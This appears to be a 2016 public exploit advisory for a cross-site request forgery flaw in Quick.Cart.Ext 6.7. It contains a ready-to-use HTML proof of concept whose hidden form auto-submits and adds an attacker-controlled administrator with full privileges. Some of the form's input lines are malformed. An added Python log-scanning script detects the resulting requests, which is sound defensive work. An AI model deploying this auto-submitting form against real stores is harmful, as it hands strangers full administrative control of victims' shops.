Quick.Cart.Ext 6.7 Cross Site Request Forgery
Posted on 23 June 2016
<!--
# Exploit Title: Quick.Cart.Ext <= v6.7 Remote Admin Add CSRF Exploit
# Exploit Author: s0nk3y
# Contact : s0nk3y at gmail com
# Google Dork: -
# Date: 22/06/2016
# Vendor Homepage: https://opensolution.org
# Software Link: http://opensolution.org/download/home.html?sFile=Quick.Cart_v6.7.zip
# Version: 6.7
# Tested on: Ubuntu 16.04

Quick.Cart.Ext is vulnerable to a CSRF attack (no CSRF token is in place),
meaning that if an admin user can be tricked into visiting a crafted URL
created by an attacker (via spear phishing/social engineering), a form will be
submitted to (http://server/Quick.Cart.Ext/admin.php?p=admins-form) that adds
a new user as administrator.

Once exploited, the attacker can log in to the admin panel
(http://localhost/Quick.Cart.Ext/admin.php) using the username and the
password posted in the form.

CSRF PoC Code
=============
-->
<form method="post" action="http://server/Quick.Cart.Ext/admin.php?p=admins-form">
  <input type="hidden" name="sLogin=attacker"/>
  <input type="hidden" name="sPass" value="attacker"/>
  <input type="hidden" name="sName" value="attacker"/>
  <input type="hidden" name="sEmail" value="attacker@email.com"/>
  <input type="hidden" name="iAdmin" value="2"/>
  <input type="hidden" name="sOption=save+»"/>
  <input type="hidden" name="aPrivilagesForm[products-list]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[products-form]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[products-delete]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[products-export]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[products-import]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[orders-list]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[orders-form]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[orders-delete]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[pages-list]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[pages-form]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[pages-delete]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[shipping]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[payments]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[tools-config]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[admins]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[lang]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[backup-list]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[backup-create]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[fixes]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[plugins]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[boxes]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[vouchers]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[features]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[products-comments-list]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[pages-comments-list]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[comments-delete]" value="1"/>
  <input type="hidden" name="aPrivilagesForm[users]" value="1"/>
  <input type="hidden" name="iStatus" value="1"/>
</form>
<script>
  document.forms[0].submit();
</script>
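
A detection check for the request this PoC generates, as an added example that is not part of the original advisory: it scans a web server access log in Combined Log Format for POSTs to `admin.php?p=admins-form` whose Referer is missing or off-site. The log lines, host names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: client, timestamp, request line, status, size, referer, agent.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def _host(referer):
    """Lower-cased host of a Referer value; '' when absent ('-') or unparsable."""
    try:
        return (urlsplit(referer).hostname or "").lower()
    except ValueError:
        return ""

def find_cross_site_admin_adds(lines, site_hosts):
    """Return (timestamp, client ip, referer) for every POST to
    admin.php?p=admins-form whose Referer host is not one of site_hosts."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/admin.php"):
            continue
        if parse_qs(url.query).get("p") != ["admins-form"]:
            continue
        if _host(m["referer"]) not in site_hosts:
            hits.append((m["ts"], m["ip"], m["referer"]))
    return hits

# Constructed sample log (documentation IP ranges, hypothetical host names).
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Jun/2016:10:01:12 +0000] "POST /Quick.Cart.Ext/admin.php?p=admins-form HTTP/1.1" 302 - "http://shop.example/Quick.Cart.Ext/admin.php?p=admins-form" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Jun/2016:10:14:40 +0000] "POST /Quick.Cart.Ext/admin.php?p=admins-form HTTP/1.1" 302 - "http://other.example/promo.html" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Jun/2016:10:20:03 +0000] "POST /Quick.Cart.Ext/admin.php?p=admins-form HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Jun/2016:10:21:55 +0000] "GET /Quick.Cart.Ext/admin.php?p=admins-form HTTP/1.1" 200 5120 "http://other.example/promo.html" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Jun/2016:10:25:31 +0000] "POST /Quick.Cart.Ext/admin.php?p=products-form HTTP/1.1" 302 - "http://other.example/promo.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ts, ip, referer in find_cross_site_admin_adds(SAMPLE_LOG, {"shop.example"}):
        print(f"{ts} {ip} admin add with Referer {referer!r}")
```

A hit is a lead for review rather than proof, since browsers can omit the Referer header under a strict referrer policy; compare the timestamps against when each administrator account was created.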